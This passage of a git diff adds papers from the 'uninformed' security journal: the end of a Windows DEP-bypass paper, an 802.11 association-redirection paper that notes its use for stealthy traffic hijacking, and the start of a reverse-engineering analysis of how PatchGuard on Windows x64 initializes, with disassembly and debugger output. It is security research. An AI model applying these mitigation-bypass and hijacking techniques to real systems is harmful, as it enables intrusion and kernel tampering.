not a clear + indication. + +[5] This is possible even when an SEH overwrite is leveraged, given the right + conditions. The basic approach is to locate a pop reg, pop reg, pop esp, ret + instruction set in a region that is not protected by SafeSEH (such as a + third-party DLL that was not compiled with /GS). The pop esp shifts the stack + to the start of the EstablisherFrame that is controlled by the attacker and the + ret returns into the address stored within the overwritten Next pointer. If one + were to set the Next pointer to the location of the NtdllOkayToLockRoutine and + the stack were set up as explained above, the technique used to bypass + hardware-enforced DEP that is described in this document could be made to work. + + +Bibliography + +The Metasploit Project. War-ftpd 1.65 USER Overflow. +http://www.metasploit.com/projects/Framework/exploits.html#warftpd_165_user; +accessed Oct 2, 2005. + +Microsoft Corporation. Data Execution Prevention. +http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/BookofSP1/b0de1052-4101-44c3-a294-4da1bd1ef227.mspx; +accessed Oct 2, 2005. diff --git a/uninformed/2.4.txt b/uninformed/2.4.txt new file mode 100644 index 0000000..e21f1ed --- /dev/null +++ b/uninformed/2.4.txt @@ -0,0 +1,235 @@ +802.11 VLANs +Johnny Cache +johnycsh@gmail.com +Last modified: 09/07/05 + +1) Foreword + +Abstract: The goal of this paper is to introduce the reader to association +redirection and how it could to used to implement something analogous to VLANs +found in wired media into a typical IEEE 802.11 environment. What makes this +technique interesting is that it can be accomplished without breaking the IEEE +802.11 standard on the client side, and requires only minor changes made to the +Access Point (AP). No modifications are made to the 802.11 MAC. It is the +author's hope that after reading this paper the reader will not only +understand the specific technique outlined below, but will consider protocol +quirks with a new perspective in the future. + + +2) Background + +The IEEE 802.11 specification defines a hierarchy of three states a client can +be in. When a client wishes to connect to an Access Point (AP) he progresses +from state 1 to 2 to 3. The client progresses initially from state 1 to state 2 +by successfully authenticating (this authentication stage happens even when +there is no security enabled). Similarly the client progresses from state 2 to +3 by associating. Once a client as associated he enters state 3 and can +transmit data using the AP. + + +Unlike ethernet, 802.3, or other link layer headers, 802.11 headers contain at +least 3 addresses: source, destination, and Basic Service Set ID (BSSID). The +BSSID can be best thought of as a through field. Packets destined for the APs +interface have both destination and BSSID set to the same value. A packet +destined to a different host on the same WLAN however would have the BSSID set +to the AP and the destination set to the host. + + +The state transition diagram in the standard dictates that if a client receives +an association response with a different BSSID than the BSSID that it was +associating with, then the client should associate to the new BSSID. The +technique of sending an association response with a different BSSID in the +header is known as association redirection. While the motivation for this +idiosyncrasy is unclear, it can be leveraged to dynamically create what has +been described as a personal virtual bridged LAN (PVLAN). + + +3) Introduction + +The most compelling reason to virtualize APs has been security. There are +currently two possible techniques for doing this, though only one has been +deployed in the wild. The most prevalent has been implemented by Colubris in +their virtual access point technology. + + +The other technique, public access point (PAP) and personal virtual bridged +LANs (PVLANs), which is described in this paper, has been documented in U.S. +patent no. 20040141617. + + +3.1) The state of the art + +The Colubris virtual access point technology is a single physical device that +implements an entirely independent 802.11 MAC protocol layer (including a +unique BSSID) for each virtual AP. The only thing shared between the individual +virtual APs is the hardware they are running on. The device goes so far as to +implement virtual Management Information Bases (MIBs) for each virtual AP. The +Colubris solution fits well into a heavily managed static environment where the +users and the groups they belong to are well defined. Deploying it requires +that each user knows which SSID to associate with a priori, along with any +required authentication credentials. The virtual access point is capable of +mapping virtual access points into 802.1q VLANs. + + +The public AP solution fits well into less managed networks. Public AP +utilizes the technique outlined in this paper. The Public AP broadcasts a +single beacon for a Public Access Point (PAP). When a client attempts to +associate, the PAP redirects him to a dynamically generated VBSSID, placing him +on his own PVLAN. This is well suited to a typical hotspot scenario where there +is no implicit trust between users, and the number of clients is not known +beforehand. This technique could also be used in conjunction with traditional +802.1q VLANs, however its strength lies in the lower burden of administrative +requirements. This technique is designed to work well when deployed in the +common hot spot scenario where the administrators have little other network +infrastructure and the only thing upstream is a best effort common carrier +provider. + + +4) PVLANs and virtual BSSIDs + +PVLANs are called Personal Bridged VLANs because the VLAN is created +dynamically for the client. The client essentially owns the VLAN since he +controls its creation and its lifetime. In the most common scenario there +would only be a single client per PVLAN. + + +An access point that implements the PAP concept intentionally re-directs +associating clients to their own dynamically generated BSSID (Virtual BSSID or +VBSSID). + + +In the example below the AP is broadcasting a public BSSID of 00:11:22:33:44:55 +and is redirecting the client to his own VBSSID 00:22:22:22:22:22. + + +5) The Experiment + +The experiment conducted was not a full-blown implementation of a PAP. The +experiment was designed to test a wide variety of chipsets, cards, and drivers +for compatibility with the standard and susceptibility to association +re-direction. To this end all the cards were subjected to every reasonable +intrepretation of the standard. + + +The experiment was conducted by making some simple changes to the host-ap +driver on Linux. Host-ap can operate in Access Point mode as well as in client +mode. All the modifications were made in Access Point mode. Host-ap's +client-side performance is unrelated to the changes made for the experiment. + + +The experiment was conducted in two phases. First, host-ap was modified to +mangle all management frames by modifying the source, BSSID, source and BSSID +(at the same time). The results of this are reflected in table one. + +After this was complete, host-ap was modified to return authentication replies +un-mangled. This was due to the amount of cards that simply ignored mangled +authentication replys. These results are cataloged in table two. + + +5.1) The Results + +The responses in table one varied all the way from never leaving stage 1 to +successful redirection. The most interesting cases are the drivers that +successfully made it to stage 3. There are three cases of this. The cases +marked ORIGINALBSSID are what was initially expected from many devices, that +they would simply ignore the redirect request and continue to transmit on the +PAP BSSID. The REDIRECTREASSOC case is a successful redirection with a small +twist. The card transmits all data to VBSSID, however it periodically sends +out reassociation requests to the PAP BSSID. + +The SCHIZO case is the other case that made it into stage 3. In this case the +card is listening on the PAP BSSID and then proceeds to transmit on the VBSSID. +The device seems to ignore any data transmitted to it on the VBSSID. + + +As mentioned previously in table two, the possibilty of ignoring authentication +reply's has been eliminated by not mangling fields until the association +request. This opened up the possibilty for some interesting responses. + +The Apple airport extreme card responded with a flood of deauthentication +packets to the null BSSID with a destination of the AP (DEAUTHFLOOD). The +Atheros card is the only other card that sent a deauth, though it had a much +more measured response, sending a single de-auth to the original BSSID +(SIMPLEDEAUTHSTA). + +The other new response in table 2 is the DUALBSSID behavior. These cards seem +to alternate intentionally between both BSSIDS on every other transmitted +packet. It is unknown whether they continue to do this for the entire +connection or if this is some sort of intentional behavior and they will choose +whichever BSSID they receive data on first. + +The experiment provided some very surprising results. Originaly it was +suspected that many cards would simply never enter stage 3, or alternately just +use the original BSSID they set out to. Quite a few cards can be convinced to +go into dual BSSID behavior and might be susceptible to association +redirection. Two drivers for the hermes chipset were successfuly redirected. + + +6) Future Work + +Clearly modifying client side drivers for better standards compliance is one +area work could be done. More interesting questions are how does one handle key +management on the AP in this situation? Clearly any PSK solutions don't really +apply in this scenario. How much deviation from the spec needs to happen for +WPA 802.1x authentication to successfully be deployed? One interesting area of +research is the concept of a stealthy rogue AP. + + +By using association redirection clients could be the victim of stealthy (from +the perspective of the network admin) association hijacking from a rogue AP. An +adversary could just set up shop with a modified host-ap driver on a Linux box +that didn't transmit beacons. Rather it would wait for a client to attempt an +association request with the legitimate access point and try to win a race +condition to see who could send an association reply first. Alternately the +adversary could simply de-authenticate the user and then be poised to win the +race. + + +Another interesting question is the whether or not a PAP could withstand a DOS +attack attempting to create an overwhelming amount of VBSSIDs. It is the +authors opinion that a suitable algorithm could be found to make the resources +required for the attack too costly for most. By dynamically expiring PVLANs and +VBSSIDs as a function of time and traffic the PAP could burden the attacker +with keeping track of all his VBSSIDs as well, instead of just creating as many +as he can and forgetting about them. + + +7) Conclusion + +It is unlikely that this technique could be successfully be deployed to create +PVLAN's in a general scenario due to varied behavior from the vendors. +However, it does appear that a determined attacker could encode the data +generated from this experiment into a modified host-ap driver so that he could +stealthily redirect traffic to himself. This would give the attacker a slight +advantage over typical ARP poisioning attacks since he doesn't need to generate +any suspicous ARP activity. It also has an advantage over simple rogue access +points, as it requires no beacons which can easily be detected. + + +8) Bibliography + +Volpano, Dennis. United States Patent Application 200403141617 July 22, 2003 +http://appft1.uspto.gov/netahtml/PTO/search-adv.html + + Institute of Electrical and Electronics Engineers. + + Information technology - Telecommunications and information +exchange between systems - Local and metropolitan area networks - Specific +Requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical +Layer (PHY) Specifications, IEEE Std. 802.11-1999, 1999. (pg 376) + 1999 + + +Aboba, Bernard. + Virtual Access Points (IEEE document IEEE 802.11-03/154r1) May 22, 2003 +http://www.drizzle.com/ aboba/IEEE/11-03-154r1-I-Virtual-Access-Points.doc + + +Colubris Networks. Virtual Access Point Technology Multiple WLAN Services +http://www.colubris.com/literature/whitepapers.asp +accessed Aug 09, 2005. + + + + + diff --git a/uninformed/2.txt b/uninformed/2.txt new file mode 100644 index 0000000..22ab714 --- /dev/null +++ b/uninformed/2.txt @@ -0,0 +1,25 @@ + + +Engineering in Reverse +Inside Blizzard: Battle.net +Skywing +This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat service, Battle.net. The paper provides some background historical information into the design and purpose of Battle.net and continues on to discuss a variety of flaws that have been observed in the implementation of the system. Readers should come away with a better understanding of problems that can be easily introduced in designing a matchmaking/chat system to operate on such a large scale in addition to some of the serious security-related consequences of not performing proper parameter validation of untrusted clients. +html | pdf | txt + +Exploitation Technology +Temporal Return Addresses +skape +Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit authors generally make use of static addresses that may or may not be portable between various operating system and application revisions. This fact can make exploits unreliable depending on how well researched the static addresses were at the time that the exploit was implemented. In some cases, though, it may be possible to predict and make use of certain addresses in memory that do not have static contents. This document introduces the concept of temporal addresses and describes how they can be used, under certain circumstances, to make exploitation more reliable. +html | pdf | txt | code.tgz + +Bypassing Windows Hardware-enforced DEP +skape & Skywing +This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute code from regions that are typically non-executable when hardware support is present, such as thread stacks and process heaps. While other techniques have been used to accomplish similar feats, such as returning into NtProtectVirtualMemory, this approach requires no direct reprotecting of memory regions, no copying of arbitrary code to other locations, and does not have issues with NULL bytes. The result is a feasible approach that can be used to easily bypass the enhancements offered by hardware-enforced DEP on Windows in a way that requires very minimal modifications to existing exploits. +html | pdf | txt + +General Research +802.11 VLANs and Association Redirection +Johnny Cache +The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. What makes this technique interesting is that it can be accomplished without breaking the IEEE 802.11 standard on the client side, and requires only minor changes made to the Access Point (AP). No modifications are made to the 802.11 MAC. It is the author's hope that after reading the paper the reader will not only understand the specific technique outlined below, but will consider protocol specifications with a new perspective in the future. +html | pdf | txt + diff --git a/uninformed/3.1.txt b/uninformed/3.1.txt new file mode 100644 index 0000000..dc55c79 --- /dev/null +++ b/uninformed/3.1.txt @@ -0,0 +1,2069 @@ +Bypassing PatchGuard on Windows x64 +skape & Skywing +Dec 1, 2005 + + +1) Foreword + +Abstract: The Windows kernel that runs on the x64 platform +has introduced a new feature, nicknamed PatchGuard, that is intended +to prevent both malicious software and third-party vendors from +modifying certain critical operating system structures. These +structures include things like specific system images, the SSDT, the +IDT, the GDT, and certain critical processor MSRs. This feature is +intended to ensure kernel stability by preventing uncondoned +behavior, such as hooking. However, it also has the side effect of +preventing legitimate products from working properly. For that +reason, this paper will serve as an in-depth analysis of +PatchGuard's inner workings with an eye toward techniques that can +be used to bypass it. Possible solutions will also be proposed for +the bypass techniques that are suggested. + +Thanks: The authors would like to thank westcose, bugcheck, uninformed, +Alex Ionescu, Filip Navara, and everyone who is motivated to learn by +their own self interest. + +Disclaimer: The subject matter discussed in this document is +presented in the interest of education. The authors cannot be held +responsible for how the information is used. While the authors have +tried to be as thorough as possible in their analysis, it is possible +that they have made one or more mistakes. If a mistake is observed, +please contact one or both of the authors so that it can be corrected. + +2) Introduction + + +In the caste system of operating systems, the kernel is king. And +like most kings, the kernel is capable of defending itself from the +lesser citizens, such as user-mode processes, through the castle +walls of privilege separation. However, unlike most kings, the +kernel is typically unable to defend itself from the same privilege +level at which it operates. Without the kernel being able to +protect its vital organs at its own privilege level, the entire +operating system is left open to modification and subversion if any +code is able to run with the same privileges as the kernel itself. + +As it stands today, most kernel implementations do not provide a +mechanism by which critical portions of the kernel can be validated +to ensure that they have not been tampered with. If existing +kernels were to attempt to deploy something like this in an +after-the-fact manner, it should be expected that a large number of +problems would be encountered with regard to compatibility. While +most kernels intentionally do not document how internal aspects are +designed to function, like how system call dispatching works, it is +likely that at least one or more third-party vendor may depend on +some of the explicit behaviors of the undocumented implementations. + +This has been exactly the case with Microsoft's operating systems. +Starting even in the days of Windows 95, and perhaps even prior to +that, Microsoft realized that allowing third-party vendors to +twiddle or otherwise play with various critical portions of the +kernel lead to nothing but headaches and stability problems, even +though it provided the highest level of flexibility. While +Microsoft took a stronger stance with Windows NT, it has still +become the case that third-party vendors use areas of the kernel +that are of particular interest to accomplishing certain feats, even +though the means used to accomplish them require the use of +undocumented structures and functions. + +While it's likely that Microsoft realized their fate long ago with +regard to losing control over the scope and types of changes they +could make to the kernel internally without affecting third-party +vendors, their ability to do anything about it has been drastically +limited. If Microsoft were to deploy code that happened to prevent +major third-party vendors from being able to accomplish their goals +without providing an adequate replacement, then Microsoft would be +in a world of hurt that would most likely rhyme with +antitrust. Even though things have appeared bleak, +Microsoft got their chance to reclaim higher levels of flexibility +in the kernel with the introduction of the x64 +architecture. While some places used x64 to mean both AMD64 +and IA64, this document will generally refer to x64 as an alias for +AMD64 only, though many of the comments may also apply to IA64. +Since the Windows kernel on the x64 architecture operates in 64-bit +mode, it stands as a requirement that all kernel-mode drivers also +be compiled to run and operate in native 64-bit mode. There are a +number of reasons for this that are outside of the scope of this +document, but suffice it to say that attempting to design a thunking +layer for device drivers that are intended to have any real +considerations for performance should be enough to illustrate that +doing so would be a horrible idea. + +By requiring that all device drivers be compiled natively as 64-bit +binaries, Microsoft effectively leveled the playing field on the new +platform and brought it back to a clean slate. This allowed them to +not have to worry about potential compatibility conflicts with +existing products because of the simple fact that none had been +established. As third-party vendors ported their device drivers to +64-bit mode, any unsupported or uncondoned behavior on the part of +the driver could be documented as being prohibited on the x64 +architecture, thus forcing the third-party to find an alternative +approach if possible. This is the dream of PatchGuard, +Microsoft's anti-patch protection system, and it seems logical that +such a goal is a reasonable one, but that's not the point of this +document. + +Instead, this document will focus on the changes to the x64 kernel +that are designed to protect critical portions of the Windows kernel +from being modified. This document will describe how the protection +mechanisms are implemented and what areas of the kernel are +protected. From there, a couple of different approaches that could +be used to disable and bypass the protection mechanisms will be +explained in detail as well as potential solutions to the bypass +techniques. In conclusion, the reasons and motivations will be +summarized and other solutions to the more fundamental problem will +be discussed. + +The real purpose of this document, though, is to illustrate that it +is impossible to securely protect regions of code and data through +the use of a system that involves monitoring said regions at a +privilege level that is equal to the level at which third-party code +is capable of running. This fact is something that is well-known, +both by Microsoft and by the security population at large, +and it should be understood without requiring an explanation. Going +toward the future, the operating system world will most likely begin +to see a shift toward more granular, hardware-enforced privilege +separation by implementing segregated trusted code bases. The +questions this will raise with respect to open-source operating +systems and DRM issues should slowly begin to increase. Only time +will tell. + +3) Implementation + + +The anti-patching technology provided in the Windows x64 kernel, +nicknamed PatchGuard, is intended to protect critical kernel +structures from being modified outside of the context of approved +modifications, such as through Microsoft-controlled hot patching. At +the time of this writing, PatchGuard is designed to protect the +following critical structures: + + + - SSDT (System Service Descriptor Table) + - GDT (Global Descriptor Table) + - IDT (Interrupt Descriptor Table) + - System images (ntoskrnl.exe, ndis.sys, hal.dll) + - Processor MSRs (syscall) + + +At a high-level, PatchGuard is implemented in the form of a set of +routines that cache known-good copies and/or checksums of structures +which are then validated at certain random time intervals (roughly +every 5 - 10 minutes). The reason PatchGuard is implemented in a +polling fashion rather than in an event-driven or hardware-backed +fashion is because there is no native hardware level support for the +things that PatchGuard is attempting to accomplish. For that +reason, a number of the tricks that PatchGuard resorted to were done +so out of necessity. + +The team that worked on PatchGuard was admittedly very clever. They +realized the limitations of implementing an anti-patching model in a +fashion described in the introduction and thus were forced to resort +to other means by which they might augment the protection +mechanisms. In particular, PatchGuard makes extensive use of +security through obscurity by using tactics like misdirection, +misnamed functions, and general code obfuscation. While many would +argue that security through obscurity adds nothing, the authors +believe that it's merely a matter of raising the bar high enough so +as to eliminate a significant number of people from being able to +completely understand something. + +The code to initialize PatchGuard begins early on in the boot +process as part of nt!KeInitSystem. And that's where the fun begins. + +3.1) Initializing PatchGuard + + +The initialization of PatchGuard is multi-faceted, but it all has to +start somewhere. In this case, the initialization of PatchGuard starts +in a function with a symbol name that has nothing to do with anti-patch +protections at all. In fact, it's named KiDivide6432 and the only thing +that it does is a division operation as shown in the code below: + + +ULONG KiDivide6432( + IN ULONG64 Dividend, + IN ULONG Divisor) +{ + return Dividend / Divisor; +} + + +Though this function may look innocuous, it's actually the first time +PatchGuard attempts to use misdirection to hide its actual intentions. +In this case, the call to nt!KiDivide6432 is passed a dividend value +from nt!KiTestDividend. The divisor is hard-coded to be 0xcb5fa3. It +appears that this function is intended to masquerade as some type of +division test that ensures that the underlying architecture supports +division operations. If the call to the function does not return the +expected result of 0x5ee0b7e5, nt!KeInitSystem will bug check the +operating system with bug check code 0x5d which is UNSUPPORTED_PROCESSOR +as shown below: + + +nt!KeInitSystem+0x158: +fffff800`014212c2 488b0d1754d5ff mov rcx,[nt!KiTestDividend] +fffff800`014212c9 baa35fcb00 mov edx,0xcb5fa3 +fffff800`014212ce e84d000000 call nt!KiDivide6432 +fffff800`014212d3 3de5b7e05e cmp eax,0x5ee0b7e5 +fffff800`014212d8 0f8519b60100 jne nt!KeInitSystem+0x170 + +... + +nt!KeInitSystem+0x170: +fffff800`0143c8f7 b95d000000 mov ecx,0x5d +fffff800`0143c8fc e8bf4fc0ff call nt!KeBugCheck + + +When attaching with local kd, the value of nt!KiTestDividend is found to +be hardcoded to 0x014b5fa3a053724c such that doing the division +operation, 0x014b5fa3a053724c divided by 0xcb5fa3, produces 0x1a11f49ae. +That can't be right though, can it? Obviously, the code above indicates +that any value other than 0x5ee0b7e5 will lead to a bug check, but it's +also equally obvious that the machine does not bug check on boot, so +what's going on here? + +The answer involves a good old fashion case of ingenuity. The result of +the the division operation above is a value that is larger than 32 bits. +The AMD64 instruction set reference manual indicates that the div +instruction will produce a divide error fault when an overflow of the +quotient occurs. This means that as long as nt!KiTestDividend is set to +the value described above, a divide error fault will be triggered +causing a hardware exception that has to be handled by the kernel. This +divide error fault is what actually leads to the indirect initialization +of the PatchGuard subsystem. Before going down that route, though, it's +important to understand one of the interesting aspects of the way +Microsoft did this. + +One of the interesting things about nt!KiTestDividend is that it's +actually unioned with an exported symbol that is used to indicate +whether or not a debugger is, well, present. This symbol is named +nt!KdDebuggerNotPresent and it overlaps with the high-order byte of +nt!KiTestDividend as shown below: + + +TestDividend L1 +fffff800`011766e0 014b5fa3`a053724c +lkd> db nt!KdDebuggerNotPresent L1 +fffff800`011766e7 01 + + +The nt!KdDebuggerNotPresent global variable will be set to zero if a +debugger is present. If a debugger is not present, the value will be +one (default). If the above described division operation is performed +while a debugger is attached to the system during boot, which would +equate to dividing 0x004b5fa3a053724c by 0xcb5fa3, the resultant +quotient will be the expected value of 0x5ee0b7e5. This means that if a +debugger is attached to the system prior to the indirect initialization +of the PatchGuard protections, then the protections will not be +initialized because the divide error fault will not be triggered. This +coincides with the documented behavior and is intended to allow driver +developers to continue to be able to set breakpoints and perform other +actions that may indirectly modify monitored regions of the kernel in a +debugging environment. However, this only works if the debugger is +attached to the system during boot. If a developer subsequently +attaches a debugger after PatchGuard has initialized, then the act of +setting breakpoints or performing other actions may lead to a bluescreen +as a result of PatchGuard detecting the alterations. Microsoft's choice +to initialize PatchGuard in this manner allows it to transparently +disable protections when a debugger is attached and also acts as a means +of hiding the true initialization vector. + +With the unioned aspect of nt!KiTestDividend understood, the next step +is to understand how the divide error fault actually leads to the +initialization of the PatchGuard subsystem. For this aspect it is +necessary to start at the places that all divide error faults go: +nt!KiDivideErrorFault. + +The indirect triggering of nt!KiDivideErrorFault leads to a series of +function calls that eventually result in nt!KiOpDiv being called to +handle the divide error fault for the div instruction. The nt!KiOpDiv +routine appears to be responsible for preprocessing the different kinds +of divide errors, like divide by zero. Although it may look normal at +first glance, nt!KiOpDiv also has a darker side. The stack trace that +leads to the calling of nt!KiOpDiv is shown below. For those curious as +to how the authors were able to debug the PatchGuard initialization +vector that is intended to be disabled when a debugger is attached, one +method is to simply break on the div instruction in nt!KiDivide6432 and +change r8d to zero. This will generate the divide error fault and lead +to the calling of the PatchGuard initialization routines. In order to +allow the machine to boot normally, a breakpoint must be set on +nt!KiDivide6432 after the fact to automatically restore r8d to 0xcb5fa3: + + +kd> k +Child-SP RetAddr Call Site +fffffadf`e4a15f90 fffff800`010144d4 nt!KiOp_Div+0x29 +fffffadf`e4a15fe0 fffff800`01058d75 nt!KiPreprocessFault+0xc7 +fffffadf`e4a16080 fffff800`0104172f nt!KiDispatchException+0x85 +fffffadf`e4a16680 fffff800`0103f5b7 nt!KiExceptionExit +fffffadf`e4a16800 fffff800`0142132b nt!KiDivideErrorFault+0xb7 +fffffadf`e4a16998 fffff800`014212d3 nt!KiDivide6432+0xb +fffffadf`e4a169a0 fffff800`0142a226 nt!KeInitSystem+0x169 +fffffadf`e4a16a50 fffff800`01243e09 nt!Phase1InitializationDiscard+0x93e +fffffadf`e4a16d40 fffff800`012b226e nt!Phase1Initialization+0x9 +fffffadf`e4a16d70 fffff800`01044416 nt!PspSystemThreadStartup+0x3e +fffffadf`e4a16dd0 00000000`00000000 nt!KxStartSystemThread+0x16 + + +The first thing that nt!KiOpDiv does prior to processing the actual +divide fault is to call a function named nt!KiFilterFiberContext. This +function seems oddly named not only in the general sense but also in the +specific context of a routine that is intended to be dealing with divide +faults. By looking at the body of nt!KiFilterFiberContext, its +intentions quickly become clear: + + +nt!KiFilterFiberContext: +fffff800`01003ac2 53 push rbx +fffff800`01003ac3 4883ec20 sub rsp,0x20 +fffff800`01003ac7 488d0552d84100 lea rax,[nt!KiDivide6432] +fffff800`01003ace 488bd9 mov rbx,rcx +fffff800`01003ad1 4883c00b add rax,0xb +fffff800`01003ad5 483981f8000000 cmp [rcx+0xf8],rax +fffff800`01003adc 0f855d380c00 jne nt!KiFilterFiberContext+0x1d +fffff800`01003ae2 e899fa4100 call nt!KiDivide6432+0x570 + + +It appears that this chunk of code is designed to see if the address +that the fault error occurred at is equal to nt!KiDivide6432 + 0xb. If +one adds 0xb to nt!KiDivide6432 and disassembles the instruction at that +address, the result is: + + +nt!KiDivide6432+0xb: +fffff800`0142132b 41f7f0 div r8d + + +This coincides with what one would expect to occur when the quotient +overflow condition occurs. According to the disassembly above, if the +fault address is equal to nt!KiDivide6432 + 0xb, then an unnamed symbol +is called at nt!KiDivide6432 + 0x570. This unnamed symbol will +henceforth be referred to as nt!KiInitializePatchGuard, and it is what +drives the set up of the PatchGuard subsystem. + +The nt!KiInitializePatchGuard routine itself is quite large. It handles +the initialization of the contexts that will monitor certain system +images, the SSDT, processor GDT/IDT, certain critical MSRs, and certain +debugger-related routines. The very first thing that the initialization +routine does is to check to see if the machine is being booted in safe +mode. If it is being booted in safe mode, the PatchGuard subsystem will +not be enabled as shown below: + + +nt!KiDivide6432+0x570: +fffff800`01423580 4881ecd8020000 sub rsp,0x2d8 +fffff800`01423587 833d22dfd7ff00 cmp dword ptr [nt!InitSafeBootMode],0x0 +fffff800`0142358e 0f8504770000 jne nt!KiDivide6432+0x580 + +... + +nt!KiDivide6432+0x580: +fffff800`0142ac98 b001 mov al,0x1 +fffff800`0142ac9a 4881c4d8020000 add rsp,0x2d8 +fffff800`0142aca1 c3 ret + + +Once the safe mode check has passed, nt!KiInitializePatchGuard begins +the PatchGuard initialization by calculating the size of the INITKDBG +section in ntoskrnl.exe. It accomplishes this by passing the address of +a symbol found within that section, nt!FsRtlUninitializeSmallMcb, to +nt!RtlPcToFileHeader. This routine passes back the base address of nt +in an output parameter that is subsequently passed to +nt!RtlImageNtHeader. This method returns a pointer to the image's +IMAGENTHEADERS structure. From there, the virtual address of +nt!FsRtlUninitializeSmallMcb is calculated by subtracting the base +address of nt from it. The calculated RVA is then passed to +nt!RtlSectionTableFromVirtualAddress which returns a pointer to the +image section that nt!FsRtlUninitializeSmallMcb resides in. The +debugger output below shows what rax points to after obtaining the image +section structure: + + +kd> ? rax +Evaluate expression: -8796076244456 = fffff800`01000218 +kd> dt nt!_IMAGE_SECTION_HEADER fffff800`01000218 ++0x000 Name : [8] "INITKDBG" ++0x008 Misc : ++0x00c VirtualAddress : 0x165000 ++0x010 SizeOfRawData : 0x2600 ++0x014 PointerToRawData : 0x163a00 ++0x018 PointerToRelocations : 0 ++0x01c PointerToLinenumbers : 0 ++0x020 NumberOfRelocations : 0 ++0x022 NumberOfLinenumbers : 0 ++0x024 Characteristics : 0x68000020 + + +The whole reason behind this initial image section lookup has to do with +one of the ways in which PatchGuard obfuscates and hides the code that +it executes. In this case, code within the INITKDBG section will +eventually be copied into an allocated protection context that will be +used during the validation phase. The reason that this is necessary +will be discussed in more detail later. + +After collecting information about the INITKDBG image section, the +PatchGuard initialization routine performs the first of many +pseudo-random number generations. This code can be seen throughout the +PatchGuard functions and has a form that is similar to the code shown +below: + + +fffff800`0142362d 0f31 rdtsc +fffff800`0142362f 488bac24d8020000 mov rbp,[rsp+0x2d8] +fffff800`01423637 48c1e220 shl rdx,0x20 +fffff800`0142363b 49bf0120000480001070 mov r15,0x7010008004002001 +fffff800`01423645 480bc2 or rax,rdx +fffff800`01423648 488bcd mov rcx,rbp +fffff800`0142364b 4833c8 xor rcx,rax +fffff800`0142364e 488d442478 lea rax,[rsp+0x78] +fffff800`01423653 4833c8 xor rcx,rax +fffff800`01423656 488bc1 mov rax,rcx +fffff800`01423659 48c1c803 ror rax,0x3 +fffff800`0142365d 4833c8 xor rcx,rax +fffff800`01423660 498bc7 mov rax,r15 +fffff800`01423663 48f7e1 mul rcx +fffff800`01423666 4889442478 mov [rsp+0x78],rax +fffff800`0142366b 488bca mov rcx,rdx +fffff800`0142366e 4889942488000000 mov [rsp+0x88],rdx +fffff800`01423676 4833c8 xor rcx,rax +fffff800`01423679 48b88fe3388ee3388ee3 mov rax,0xe38e38e38e38e38f +fffff800`01423683 48f7e1 mul rcx +fffff800`01423686 48c1ea03 shr rdx,0x3 +fffff800`0142368a 488d04d2 lea rax,[rdx+rdx*8] +fffff800`0142368e 482bc8 sub rcx,rax +fffff800`01423691 8bc1 mov eax,ecx + + +This pseudo-random number generator uses the rdtsc instruction as a seed +and then proceeds to perform various bitwise and multiplication +operations until the end result is produced in eax. The result of this +first random number generator is used to index an array of pool tags +that are used for PatchGuard memory allocations. This is an example of +one of the many ways in which PatchGuard attempts to make it harder to +find its own internal data structures in memory. In this case, it adopts +a random legitimate pool tag in an effort to blend in with other memory +allocations. The code block below shows how the pool tag array is +indexed and where it can be found in memory: + + +fffff800`01423693 488d0d66c9bdff lea rcx,[nt] +fffff800`0142369a 448b848100044300 mov r8d,[rcx+rax*4+0x430400] + + +In this case, the random number is stored in the rax register which is +used to index the array of pool tags found at nt+0x430400. The fact +that the array is referenced indirectly might be seen as another attempt +at obfuscation in a bid to make what is occurring less obvious at a +glance. If the pool tag array address is dumped in the debugger, all of +the pool tags that could possibly be used by PatchGuard can be seen: + + +lkd> db nt+0x430400 +41 63 70 53 46 69 6c 65-49 70 46 49 49 72 70 20 AcpSFileIpFIIrp +4d 75 74 61 4e 74 46 73-4e 74 72 66 53 65 6d 61 MutaNtFsNtrfSema +54 43 50 63 00 00 00 00-10 3b 03 01 00 f8 ff ff TCPc.....;...... + + +After the fake pool tag has been selected from the array at random, +the PatchGuard initialization routine proceeds by allocating a random +amount of storage that is bounded at a minimum by the virtual size of +the INITKDBG section plus 0x1b8 and at a maximum by the minimum plus +0x7ff. The magic value 0x1b8 that is expressed in the minimum size is +actually the size of the data structure that is used by PatchGuard to +store context-specific protection information, as will be shown later. +The fake pool tag and the random size are then used to allocate storage +from the NonPagedPool as shown in the pseudo-code below: + + +Context = ExAllocatePoolWithTag( + NonPagedPool, + (InitKdbgSection->VirtualSize + 0x1b8) + (RandSize & 0x7ff), + PoolTagArray[RandomPoolTagIndex]); + + +If the allocation of the context succeeds, the initialization routine +zeroes its contents and then starts initializing some of the structure's +attributes. The context returned by the allocation will henceforth be +referred to as a structure of type PATCHGUARD_CONTEXT. The first 0x48 +bytes of the structure are actually composed of code that is copied from +the misleading symbol named nt!CmpAppendDllSection. This function is +actually used to decrypt the structure at runtime, as will be seen +later. After nt!CmpAppendDllSection is copied to the first 0x48 bytes of +the data structure, the initialization routine sets up a number of +function pointers that are stored within the structure. The routines +that it stores the addresses of and the offsets within the PatchGuard +context data structure are shown below. + + + +--------+-------------------------------------------+ + | Offset | Symbol | + +--------+-------------------------------------------+ + | 0x48 | nt!ExAcquireResourceSharedLite | + | 0x50 | nt!ExAllocatePoolWithTag | + | 0x58 | nt!ExFreePool | + | 0x60 | nt!ExMapHandleToPointer | + | 0x68 | nt!ExQueueWorkItem | + | 0x70 | nt!ExReleaseResourceLite | + | 0x78 | nt!ExUnlockHandleTableEntry | + | 0x80 | nt!ExAcquireGuardedMutex | + | 0x88 | nt!ObDereferenceObjectEx | + | 0x90 | nt!KeBugCheckEx | + | 0x98 | nt!KeInitializeDpc | + | 0xa0 | nt!KeLeaveCriticalRegion | + | 0xa8 | nt!KeReleaseGuardedMutex | + | 0xb0 | nt!ObDereferenceObjectEx2 | + | 0xb8 | nt!KeSetAffinityThread | + | 0xc0 | nt!KeSetTimer | + | 0xc8 | nt!RtlImageDirectoryEntryToData | + | 0xd0 | nt!RtlImageNtHeaders | + | 0xd8 | nt!RtlLookupFunctionEntry | + | 0xe0 | 